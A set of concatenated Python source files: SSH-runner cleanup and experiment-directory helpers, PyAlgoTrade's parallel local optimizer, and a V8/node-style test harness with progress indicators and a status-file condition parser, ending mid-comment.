logger.info("PID file found %s, trying to terminate..." % self.pid_path)
try:
pid = None
with open(self.pid_path) as fh:
pid = int(fh.read().strip())
logger.info("Sending SIGTERM to PID %s" % pid)
os.kill(pid, signal.SIGTERM)
time.sleep(2)
except Exception as e:
logger.error("Exception when terminating running ssh %s" % (e,), exc_info=e)
logger.info("SSH runner shutdown")
self.runner.shutdown()
logger.info("SSH runner cleanup")
rtt_utils.try_remove(self.pid_path)
rtt_utils.try_remove(self.script_path)
rtt_utils.try_remove(self.ask_pass_path)
self.pid_path = None
self.script_path = None
self.ask_pass_path = None
logger.info("SSH Shutdown finished")
def create_experiments_dir(basedir):
os.makedirs(basedir, 0o771, True)
d1 = ["AlgorithmTesting",
"BBS",
"CCG",
"G-SHA1",
"LCG",
"MODEXP",
"MS",
"QCG1",
"QCG2",
"XOR",
]
d2 = ["Frequency",
"BlockFrequency",
"Runs",
"LongestRun",
"Rank",
"FFT",
"NonOverlappingTemplate",
"OverlappingTemplate",
"Universal",
"LinearComplexity",
"Serial",
"ApproximateEntropy",
"CumulativeSums",
"RandomExcursions",
"RandomExcursionsVariant",
]
for cd in d1:
cdfull = os.path.join(basedir, "experiments", cd)
os.makedirs(cdfull, 0o771, True)
for cd2 in d2:
cd2full = os.path.join(cdfull, cd2)
os.makedirs(cd2full, 0o771, True)
def copy_templates_dir(basedir, target):
src = os.path.join(basedir, "templates")
dst = os.path.join(target, "templates")
try:
shutil.rmtree(dst, True)
return shutil.copytree(src, dst)
except Exception as e:
logger.error("Exception in copying template dir: %s" % (e,), exc_info=e)
raise
|
local.py
|
# PyAlgoTrade
#
# Copyright 2011-2015 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import multiprocessing
import threading
import logging
import socket
import random
import os
from pyalgotrade.optimizer import server
from pyalgotrade.optimizer import worker
class ServerThread(threading.Thread):
def __init__(self, server, barFeed, strategyParameters):
super(ServerThread, self).__init__()
self.__server = server
self.__barFeed = barFeed
self.__strategyParameters = strategyParameters
self.__results = None
def getResults(self):
return self.__results
def run(self):
self.__results = self.__server.serve(self.__barFeed, self.__strategyParameters)
def worker_process(strategyClass, port):
class Worker(worker.Worker):
def runStrategy(self, barFeed, *args, **kwargs):
strat = strategyClass(barFeed, *args, **kwargs)
strat.run()
return strat.getResult()
# Create a worker and run it.
name = "worker-%s" % (os.getpid())
w = Worker("localhost", port, name)
w.getLogger().setLevel(logging.ERROR)
w.run()
def find_port():
while True:
        ret = random.randint(1025, 65535)
try:
s = socket.socket()
s.bind(("localhost", ret))
s.close()
return ret
except socket.error:
pass
def run(strategyClass, barFeed, strategyParameters, workerCount=None):
"""Executes many instances of a strategy in parallel and finds the parameters that yield the best results.
:param strategyClass: The strategy class.
:param barFeed: The bar feed to use to backtest the strategy.
:type barFeed: :class:`pyalgotrade.barfeed.BarFeed`.
:param strategyParameters: The set of parameters to use for backtesting. An iterable object where **each element is a tuple that holds parameter values**.
:param workerCount: The number of strategies to run in parallel. If None then as many workers as CPUs are used.
:type workerCount: int.
:rtype: A :class:`Results` instance with the best results found.
"""
assert(workerCount is None or workerCount > 0)
if workerCount is None:
workerCount = multiprocessing.cpu_count()
ret = None
workers = []
port = find_port()
if port is None:
raise Exception("Failed to find a port to listen")
# Build and start the server thread before the worker processes. We'll manually stop the server once workers have finished.
srv = server.Server("localhost", port, False)
serverThread = ServerThread(srv, barFeed, strategyParameters)
serverThread.start()
try:
# Build the worker processes.
for i in range(workerCount):
workers.append(multiprocessing.Process(target=worker_process, args=(strategyClass, port)))
# Start workers
for process in workers:
process.start()
# Wait workers
for process in workers:
process.join()
finally:
# Stop and wait the server to finish.
srv.stop()
serverThread.join()
ret = serverThread.getResults()
return ret
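# A minimal usage sketch (not part of the original module). MyStrategy and barFeed
# are hypothetical placeholders: any backtesting strategy class and any bar feed
# instance; each element of the parameters iterable is a tuple of the positional
# arguments passed to the strategy constructor after the feed. getResult() and
# getParameters() are assumed from the optimizer server's Results object.
#
#   results = run(MyStrategy, barFeed, [(10,), (20,), (30,)], workerCount=2)
#   if results is not None:
#       best_params, best_value = results.getParameters(), results.getResult()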
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import optparse
import os
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
sys.path.append(dirname(__file__) + "/../deps/v8/tools");
import utils
VERBOSE = False
NO_TRUNCATE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases):
self.cases = cases
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
case.duration = (datetime.now() - start)
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def Starting(self):
print '1..%i' % len(self.cases)
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
command = basename(output.command[-1])
if output.UnexpectedOutput():
print 'not ok %i - %s' % (self._done, command)
for l in output.output.stderr.splitlines():
print '#' + l
for l in output.output.stdout.splitlines():
print '#' + l
else:
print 'ok %i - %s' % (self._done, command)
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
print ' ---'
print ' duration_ms: %d.%d' % (total_seconds, duration.microseconds / 1000)
print ' ...'
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, templates):
super(CompactProgressIndicator, self).__init__(cases)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED --- with exit code " + str(output.output.exit_code)
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
if not NO_TRUNCATE:
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand())
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
      # full, it'll die with an EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
try:
os.unlink(name)
except OSError, e:
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path, mode)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output, options):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = options.repeat
if options.jxpath:
self.jxpath = options.jxpath
def GetVm(self, mode):
if mode == 'debug':
name = 'out/Debug/jx'
else:
name = 'out/Release/jx'
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
out_dir = os.path.join(dirname(__file__), "..", "out")
if not exists(out_dir):
if mode == 'debug':
name = os.path.abspath('Debug/jx.exe')
else:
name = os.path.abspath('Release/jx.exe')
else:
name = os.path.abspath(name + '.exe')
if hasattr(self, "jxpath"):
name = self.jxpath
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[mode]
def RunTestCases(cases_to_run, progress, tasks):
progress = PROGRESS_INDICATORS[progress](cases_to_run)
return progress.Run(tasks)
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
    left = Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
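# Illustrative sketch (not part of the original harness; the condition string and
# environment below are hypothetical): shows how a status-file condition is parsed
# and then evaluated against an environment dict.
def ExampleParseCondition():
  ast = ParseCondition('$mode == debug && $arch == x64')
  env = { 'mode': 'debug', 'arch': 'x64' }
  return ast.Evaluate(env, {})  # True for this env, False otherwise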
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
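# Illustrative sketch of the status-file syntax accepted above (the entries are
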